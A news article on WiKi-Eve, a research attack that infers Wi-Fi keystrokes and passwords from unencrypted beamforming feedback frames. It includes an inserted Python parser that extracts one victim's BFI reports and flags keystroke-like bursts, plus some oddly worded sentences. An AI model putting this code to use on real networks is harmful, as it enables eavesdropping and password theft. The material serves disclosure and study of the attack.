Wi-Fi payloads are encrypted, but researchers have found that unencrypted protocol messages leak enough side-channel data for keystroke analysis, enabling the extraction of information such as passwords.
In a preprint published on arXiv, Singaporean and Chinese academics show that the beamforming feedback information (BFI) exchanged by modern Wi-Fi devices is transmitted in plaintext, making it easy to eavesdrop.
BFI is a feedback mechanism introduced in 2013 with the publication of 802.11ac: the client measures the channel state and reports it to the access point (AP) in unencrypted management (Action) frames, so the AP can steer its transmissions more accurately towards that device.
Their attack, dubbed WiKi-Eve (after Eve, cryptography's conventional eavesdropper), needs no special hardware: any standard wireless network interface will do, so long as it can be put into monitor mode.
Eve first identifies the victim's MAC address (the victim being Bob, by convention), which lets her pick Bob's frames out of the captured traffic, obtain his IP address, and launch the WiKi-Eve attack.
“By continuously recording the BFIs in the wi-fi frames from Bob during the time window of Bob’s password typing, Eve can obtain a time series of BFI samples,” the paper stated.
The time series is then correlated with a password Bob uses to access a service (for example, when Bob contacts WeChat, the password is transmitted early in the interaction, which tells Eve when the typing happened).
The researchers then trained a keystroke-inference model, using an adversarial learning framework, on the cleartext BFI samples; the model recovers the keystrokes from this channel side channel alone, so the encrypted payload itself is never decrypted.
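To make concrete what "in plaintext" means here, the following is an added example, not code from the paper or from the researchers: a self-contained Python parser for the 802.11ac VHT Compressed Beamforming Action frame that carries BFI, run over a constructed monitor-mode capture. It keeps only the reports transmitted by the victim's MAC, pulls the per-stream SNR and the feedback angles out of each report into a time series, and flags bursts of channel change as candidate keystroke windows with a simple threshold rule that stands in for the paper's learning model. The frame layout (management/Action header, VHT MIMO Control bit positions, Givens-angle order and de-quantization) follows 802.11ac; the LSB-first angle packing, the single-segment SU-only assumption, the MAC addresses, the capture timing and the burst threshold are assumptions of this example.

```python
# Added example (not the paper's code): decode the unencrypted VHT Compressed
# Beamforming Action frame that carries BFI, as any monitor-mode sniffer can.
import math
import struct

VHT_CATEGORY, VHT_COMPRESSED_BF = 21, 0      # Action category "VHT", action "Compressed Beamforming"
BOB, AP, ALICE = (bytes.fromhex(h) for h in ("020000000b0b", "02000000a9a9", "02000000a1a1"))  # constructed MACs


def _angle_order(nr, nc):
    """Givens angle order for an Nr x Nc matrix: per column i, (Nr-i) phi then (Nr-i) psi."""
    order = []
    for i in range(1, min(nc, nr - 1) + 1):
        order += ["phi"] * (nr - i) + ["psi"] * (nr - i)
    return order


def _angle_widths(codebook, mu):
    """(b_phi, b_psi) quantization widths chosen by the Codebook Information bit."""
    return ((9, 7) if codebook else (7, 5)) if mu else ((6, 4) if codebook else (4, 2))


def parse_bfi(frame):
    """Decode a raw 802.11 frame (radiotap stripped); None unless it is a VHT Compressed
    Beamforming report. Assumed here: single-segment SU report, angles packed LSB-first."""
    if len(frame) < 29:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    if ((fc >> 2) & 0x3) != 0 or ((fc >> 4) & 0xF) != 13:     # management / Action
        return None
    body = frame[24:]
    if body[0] != VHT_CATEGORY or body[1] != VHT_COMPRESSED_BF:
        return None
    ctrl = int.from_bytes(body[2:5], "little")                  # VHT MIMO Control field
    nc, nr = (ctrl & 0x7) + 1, ((ctrl >> 3) & 0x7) + 1
    codebook, mu, token = (ctrl >> 10) & 1, (ctrl >> 11) & 1, (ctrl >> 18) & 0x3F
    report, order = body[5:], _angle_order(nr, nc)
    if len(report) < nc or not order:
        return None
    snr_db = [22 + s / 4 for s in struct.unpack_from(f"{nc}b", report, 0)]  # 0.25 dB steps
    b_phi, b_psi = _angle_widths(codebook, mu)
    widths = [b_phi if k == "phi" else b_psi for k in order]
    angle_bytes = report[nc:]
    ns = len(angle_bytes) * 8 // sum(widths)                    # subcarriers, from the length
    stream, pos, angles = int.from_bytes(angle_bytes, "little"), 0, []
    for _ in range(ns):
        for kind, w in zip(order, widths):
            raw = (stream >> pos) & ((1 << w) - 1)
            pos += w
            # de-quantize: phi = pi(2k+1)/2^b_phi, psi = pi(2k+1)/2^(b_psi+2)
            angles.append(math.pi * (2 * raw + 1) / (1 << (w if kind == "phi" else w + 2)))
    return {"src": frame[10:16], "dst": frame[4:10], "token": token, "nr": nr,
            "nc": nc, "subcarriers": ns, "snr_db": snr_db, "angles": angles}


def build_bfi_frame(src, dst, token, snr_raw, quantized):
    """Constructed Nr=2, Nc=1, SU, codebook-0 report (20 MHz, Ng=4); `quantized` holds
    one (phi11, psi21) index pair per subcarrier."""
    hdr = struct.pack("<HH6s6s6sH", 0x00D0, 0, dst, src, dst, 0)  # type 0, subtype 13
    ctrl = (0 << 0) | (1 << 3) | (0 << 6) | (2 << 8) | (token << 18)
    stream = 0
    for i, (phi, psi) in enumerate(quantized):
        stream |= ((phi & 0xF) | ((psi & 0x3) << 4)) << (6 * i)
    return (hdr + bytes([VHT_CATEGORY, VHT_COMPRESSED_BF]) + ctrl.to_bytes(3, "little")
            + struct.pack("b", snr_raw) + stream.to_bytes((6 * len(quantized) + 7) // 8, "little"))


def demo_capture():
    """Constructed capture, (timestamp_ms, frame): Bob reports BFI every 20 ms, two keystrokes
    disturb the channel at reports 6-8 and 18-20; Alice's reports and a data frame are mixed in."""
    cap = []
    for k in range(30):
        phi = 9 if k in (6, 7, 8, 18, 19, 20) else 5
        cap.append((20 * k, build_bfi_frame(BOB, AP, k % 64, -8, [(phi, 1)] * 16)))
        if k % 10 == 0:
            cap.append((20 * k + 1, build_bfi_frame(ALICE, AP, k, 0, [(3, 2)] * 16)))
            cap.append((20 * k + 2, struct.pack("<HH6s6s6sH", 0x0008, 0, AP, BOB, AP, 0) + bytes(8)))
    return cap


def bfi_series(capture, victim_mac):
    """The paper's first step: keep only BFI reports transmitted by the victim."""
    return [(ts, rec["angles"]) for ts, frame in capture
            if (rec := parse_bfi(frame)) and rec["src"] == victim_mac]


def keystroke_windows(series, threshold, gap_ms):
    """Toy segmentation in place of the paper's model: a window opens when the angle
    vector jumps more than `threshold` radians between reports, closes after `gap_ms`."""
    windows, start, last = [], None, None
    for (_, a0), (t1, a1) in zip(series, series[1:]):
        if math.dist(a0, a1) > threshold:
            start, last = (t1 if start is None else start), t1
        elif start is not None and t1 - last > gap_ms:
            windows.append((start, last))
            start = None
    if start is not None:
        windows.append((start, last))
    return windows
```

On a real capture the input would be the frames of a pcap taken on a monitor-mode interface, with the radiotap header removed before calling `parse_bfi`; nothing in the parser needs a key, which is the point. Note that the feedback is sent by the client (Bob) to the AP, so the victim's MAC is matched against the transmitter address, and that the threshold rule here only locates bursts of channel change; mapping those bursts to individual keys is the job of the trained model described above.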
In their tests, the researchers claimed “WiKi-Eve achieves 88.9 percent inference accuracy for individual keystrokes and up to 65.8 percent top-10 accuracy for stealing passwords of mobile applications (eg WeChat).”
The research was conducted by Jingyang Hu and Hongbo Jiang of China’s Hunan University, Hongbo Wang, Tianyue Zheng, Jingzhi Hu and Jun Luo of Nanyang Technological University in Singapore, and Zhe Chen of Fudan University in China.